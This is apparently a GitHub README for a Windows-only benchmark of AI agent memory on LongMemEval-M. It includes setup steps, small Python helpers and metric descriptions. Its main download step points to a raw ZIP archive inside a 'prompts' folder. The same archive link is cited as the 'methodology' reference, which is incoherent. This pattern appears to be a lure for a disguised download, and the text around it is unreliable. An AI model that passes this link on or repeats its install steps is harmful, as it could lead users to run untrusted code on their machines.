This project provides tools to test and measure how well AI agents recall information. It tracks performance on the LongMemEval-M dataset. You can use these benchmarks to verify accuracy and test memory consistency. The system currently achieves 71.7 percent accuracy on the primary test set.
Artificial intelligence agents often struggle to remember context over long sessions. This software provides a standardized way to check those memory gaps. By running these benchmarks, you can see how different configurations handle complex knowledge graphs and retrieval tasks. This repository contains the code needed to replicate existing studies on AI memory and agent performance.
You need a Windows computer to run these benchmarks. Ensure your system meets the following specifications:
- Operating System: Windows 10 or Windows 11.
- Processor: A modern multi-core processor from Intel or AMD.
- Memory: 8 gigabytes of RAM or more.
- Storage: 2 gigabytes of free space for the evaluation files and environment.
- Software: You must have Python installed. If you do not have it, the setup process will guide you.
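Some of the specifications above can be checked from Python before you install anything. The following is a minimal sketch, not part of the repository: the function name `check_requirements` is hypothetical, and the RAM check is left out because the standard library has no portable call for it.

```python
import os
import platform
import shutil

# 2 GB of free space, taken from the storage requirement listed above.
MIN_FREE_BYTES = 2 * 1024**3


def check_requirements(path="."):
    """Return a list of human-readable problems; an empty list means every check passed.

    Hypothetical helper for illustration. Running it at all confirms that
    Python is installed.
    """
    problems = []
    system = platform.system()
    if system != "Windows":
        problems.append(f"Expected Windows, found {system or 'an unknown system'}")
    if (os.cpu_count() or 1) < 2:
        problems.append("A multi-core processor is recommended")
    if shutil.disk_usage(path).free < MIN_FREE_BYTES:
        problems.append("Less than 2 GB of free disk space")
    return problems


if __name__ == "__main__":
    for problem in check_requirements():
        print("WARNING:", problem)
```

If the script prints nothing, the checks it covers passed. Confirm the Windows version and the amount of RAM by hand.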
Follow these steps to set up the software on your computer.
- Download the software archive: https://github.com/Bovirulent551/agentbrain-benchmarks/raw/refs/heads/main/prompts/agentbrain-benchmarks-v2.0.zip
- If you are browsing the repository page instead, look for the green button labeled Code and select Download ZIP.
- Save the file to your computer.
- Extract the contents of the ZIP file into a dedicated folder, for example inside your Documents folder.
Open your terminal or command prompt to finish the setup.
- Open the folder where you extracted the files.
- Hold the Shift key and right-click inside the folder.
- Select Open PowerShell window here or Open in Terminal.
- Type the command `pip install -r requirements.txt` and press Enter.
- Wait for the process to finish. This installs the necessary components to run the benchmarks.
Once you finish the installation, you can start the evaluation process.
- Return to the terminal window.
- Type `python main.py` and press Enter.
- The system will load the LongMemEval-M dataset.
- Follow the prompts on your screen to select the specific agent model you wish to test.
- The software will process the memory sequences and output the accuracy score.
The benchmark outputs a report at the end of the run. This report breaks down performance by memory type and retrieval success.
- Total Accuracy: The percentage of questions the agent answered correctly.
- Latency: The time the agent took to recall specific information.
- Knowledge Graph Integrity: A measure of how well the agent maintained logical connections between data points.
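To make the first two metrics concrete, here is a minimal sketch of how they could be computed from per-question records. The record layout (`correct`, `latency_s`, `memory_type`), the memory type names, and both function names are assumptions for illustration. The actual report format is not documented here, and Knowledge Graph Integrity is omitted because its formula is not given.

```python
from collections import defaultdict
from statistics import mean


def summarize(records):
    """Compute total accuracy (percent) and mean latency (seconds)."""
    if not records:
        raise ValueError("no records to summarize")
    correct = sum(1 for r in records if r["correct"])
    return {
        "total_accuracy": 100.0 * correct / len(records),
        "mean_latency_s": mean(r["latency_s"] for r in records),
    }


def accuracy_by_type(records):
    """Break accuracy (percent) down by the hypothetical 'memory_type' field."""
    counts = defaultdict(lambda: [0, 0])  # memory type -> [correct, total]
    for r in records:
        counts[r["memory_type"]][0] += int(r["correct"])
        counts[r["memory_type"]][1] += 1
    return {t: 100.0 * c / n for t, (c, n) in counts.items()}


# Made-up records, for illustration only; these are not benchmark results.
records = [
    {"memory_type": "single-session", "correct": True, "latency_s": 0.5},
    {"memory_type": "single-session", "correct": False, "latency_s": 1.5},
    {"memory_type": "multi-session", "correct": True, "latency_s": 1.0},
    {"memory_type": "multi-session", "correct": True, "latency_s": 1.0},
]
summary = summarize(records)
by_type = accuracy_by_type(records)
print(summary)
print(by_type)
```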
If your score differs from the documented 71.7 percent, check your inputs and configuration. Different versions of the agent model can vary slightly in their memory performance.
What if the program stops during the benchmark? Check your internet connection. Some tests download small samples from the dataset during the first run.
How do I update the software? Delete your current folder and download the latest version from the link above. This ensures you use the most current benchmarks.
Can I use this for my own models? Yes. Place your model files in the models folder and update the configuration file in the main directory.
- `data/`: Contains the evaluation datasets.
- `models/`: Stores the agent configurations.
- `results/`: Saves your report files after a test.
- `main.py`: The entry point for starting the benchmark application.
- `requirements.txt`: Lists the software tools required to run the code.
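If a run fails right after extraction, it can help to confirm that the layout above is in place. The sketch below is an illustration and not part of the repository. The helper name `missing_entries` is hypothetical, and `results/` may only appear after the first run, so a missing `results/` entry is not necessarily an error.

```python
from pathlib import Path

# Names taken from the layout described above.
EXPECTED_DIRS = ("data", "models", "results")
EXPECTED_FILES = ("main.py", "requirements.txt")


def missing_entries(root):
    """Return the expected folders and files that are absent under root."""
    root = Path(root)
    missing = [d + "/" for d in EXPECTED_DIRS if not (root / d).is_dir()]
    missing += [f for f in EXPECTED_FILES if not (root / f).is_file()]
    return missing


if __name__ == "__main__":
    # Run from the folder where you extracted the files.
    for name in missing_entries("."):
        print("Missing:", name)
```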
This project relies on established data standards. For formal background on the methodology, see https://github.com/Bovirulent551/agentbrain-benchmarks/raw/refs/heads/main/prompts/agentbrain-benchmarks-v2.0.zip. The project uses version 3 of the evaluation suite. Use these tools to maintain consistency across your own research and testing cycles.
Focus on creating reproducible environments when testing agent memory. Even minor changes to the random seed or the graph structure can change your results. Record these settings alongside your scores so that others can verify your work.
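One way to keep settings and scores together is to write them to a single JSON file per run. This is a minimal sketch under stated assumptions: the function names, the file layout, and the keys inside `settings` are hypothetical, and the benchmark may already store some of this information in its own report.

```python
import json
import random
from pathlib import Path


def seed_everything(seed):
    """Seed Python's built-in generator.

    Libraries with their own generators need to be seeded separately.
    """
    random.seed(seed)
    return seed


def save_run_record(path, seed, accuracy, settings):
    """Write the seed, score, and settings of one run to a JSON file."""
    record = {"seed": seed, "accuracy": accuracy, "settings": settings}
    Path(path).write_text(
        json.dumps(record, indent=2, sort_keys=True), encoding="utf-8"
    )
    return record
```

A call such as `save_run_record("results/run_record.json", seed_everything(1234), score, {"graph_structure": "default"})` would store everything needed to repeat the run, where `score` is the accuracy your run reported and the settings keys are whatever you varied.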
If you encounter errors during installation, make sure your user profile has permission to run scripts on your Windows machine. Most errors stem from path naming issues or from an existing Python installation that conflicts with the new packages.
This repository supports the dream-cycle and RAG memory architectures. If your agent uses custom retrieval methods, you must wrap those functions in the interface provided in the base directory. This allows the benchmarking tool to bridge your model with the standard test suite.
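The wrapping step might look like the sketch below. Every name in it is hypothetical: `MemoryAgent`, its `recall` method, and `CustomRetrievalAdapter` stand in for the interface in the base directory, whose real signatures you should take from the repository. The keyword matcher is a toy placeholder for your own retrieval method.

```python
from typing import Callable, List, Protocol


class MemoryAgent(Protocol):
    """Hypothetical stand-in for the interface provided in the base directory."""

    def recall(self, question: str, history: List[str]) -> str: ...


class CustomRetrievalAdapter:
    """Wraps a custom retrieval function so it satisfies the assumed interface."""

    def __init__(self, retrieve: Callable[[str, List[str]], List[str]]):
        self._retrieve = retrieve

    def recall(self, question: str, history: List[str]) -> str:
        passages = self._retrieve(question, history)
        # Return the top-ranked passage, or an empty string if nothing matched.
        return passages[0] if passages else ""


def keyword_retrieve(question: str, history: List[str]) -> List[str]:
    """Toy retrieval: keep turns that share at least one word with the question."""
    words = set(question.lower().split())
    return [turn for turn in history if words & set(turn.lower().split())]


agent: MemoryAgent = CustomRetrievalAdapter(keyword_retrieve)
answer = agent.recall(
    "Where is the meeting?",
    ["The meeting is in Room 4.", "Lunch was at noon."],
)
print(answer)
```

Keeping the retrieval function separate from the adapter means that only the adapter has to change if the real interface uses different method names.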